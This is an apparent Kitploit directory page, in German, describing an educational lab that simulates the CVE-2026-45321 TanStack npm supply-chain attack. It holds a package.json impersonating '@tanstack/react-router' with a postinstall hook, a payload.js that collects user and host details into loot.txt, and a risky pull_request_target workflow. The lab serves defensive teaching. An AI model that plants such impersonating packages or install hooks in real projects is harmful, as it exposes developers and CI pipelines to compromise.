Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-45321-Tanstack — Pädagogisches Labor, das npm-Supply-Chain-Angriffe, CI/CD-Missbrauch und Codeausführung zur Installationszeit über CVE-2026-45321 simuliert. Praktische defensive Sicherheitsforschung zum Verständnis von Abhängigkeitskompromittierung und Ausnutzung von Lifecycle-Hooks. | Kitploit
Tools/GitHubGitHub/renewablehacking/cve-2026-45321-tanstack
SchwachstellenanalyseMalware-AnalyseLieferkettensicherheitLernen & BildungLabs & Praxis
GitHubrenewablehacking/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

Pädagogisches Labor, das npm-Supply-Chain-Angriffe, CI/CD-Missbrauch und Codeausführung zur Installationszeit über CVE-2026-45321 simuliert. Praktische defensive Sicherheitsforschung zum Verständnis von Abhängigkeitskompromittierung und Ausnutzung von Lifecycle-Hooks.

Repository anzeigen
2vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Simulation eines Supply-Chain-Angriffs — CVE-2026-45321 (TanStack)

Bildungslabor zum Verständnis von npm-Supply-Chain-Angriffen, CI/CD-Missbrauch und Installationszeit-Codeausführung

Haftungsausschluss

Dieses Projekt wurde ausschließlich erstellt für:

  • Cybersicherheitsbildung,
  • defensive Sicherheitsforschung,
  • lokale Lab-Simulation,
  • Verständnis des Konzepts von Supply-Chain-Angriffen.

Verwenden Sie dieses Projekt nicht für:

  • Angriffe auf reale Systeme,
  • Diebstahl von Anmeldeinformationen,
  • Malware-Bereitstellung,
  • unbefugten Zugriff,
  • oder andere illegale Aktivitäten.

Beschreibung

Dieses Labor simuliert die grundlegenden Konzepte der Vorfälle:

  • CVE-2026-45321
  • TanStack npm Supply Chain Compromise
  • GitHub Actions CI/CD Abuse
  • npm Lifecycle Script Execution

Die Simulation erfolgt lokal und sicher ohne:

  • echten Diebstahl von Anmeldeinformationen,
  • Token-Exfiltration,
  • oder Kompromittierung von Drittanbieterdiensten.

Laborstruktur

root@kitploit:~
lab/
├── fake-repo/          # Simulation des Ziel-Repositorys
├── attacker-package/   # Simulation des bösartigen Pakets
└── victim-project/     # Simulation des Opfers

Funktionsweise der Simulation

root@kitploit:~
Attacker Package
        ↓
npm install
        ↓
postinstall-Skript wird ausgeführt
        ↓
payload.js wird automatisch ausgeführt
        ↓
Opfer wird von Installationszeit-Ausführung getroffen

Gelernte Konzepte

  • npm Lifecycle Hooks
  • Willkürliche Codeausführung zur Installationszeit
  • Supply-Chain-Angriff
  • CI/CD-Vertrauensgrenze
  • Bösartiges npm-Paket
  • Missbrauch von postinstall
  • Kompromittierung von Abhängigkeiten

Installation

1. Repository klonen

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

Einrichtung des Angreiferpakets

2. In den Ordner des Angreiferpakets wechseln

root@kitploit:~
cd attacker-package

3. Abhängigkeiten installieren

root@kitploit:~
npm install

4. Tarball-Paket erstellen

root@kitploit:~
npm pack

Ergebnis:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

Opfer-Simulation

5. In das Opfer-Projekt wechseln

root@kitploit:~
cd ../victim-project

6. Bösartiges Paket installieren

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

Ausgabe

Bei Erfolg erscheint:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

und die Datei:

root@kitploit:~
loot.txt

wird automatisch erstellt.


Beispiel payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

Beispiel package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

CI/CD-Simulation

Dieses Projekt kann auch zum Verständnis von Folgendem verwendet werden:

  • GitHub Actions
  • pull_request_target
  • CI/CD-Privilegiengrenze
  • Ausführung von Abhängigkeiten

Beispiel-Workflow:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

Zusammenhang mit CVE-2026-45321

Lab-SimulationReale Welt
attacker-packageKompromittiertes TanStack-Paket
payload.jsBösartiger Installer
postinstallMissbrauch von Lifecycle-Hooks
victim-projectEntwickler/CI-Opfer
fake-repoGitHub Actions-Pipeline

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

Nur zu Bildungszwecken

Dieses Labor wurde erstellt, um das Bewusstsein zu schärfen für:

  • Lieferkettensicherheit,
  • Abhängigkeitssicherheit,
  • CI/CD-Sicherheit,
  • und defensive Sicherheitsforschung.
Tool herunterladen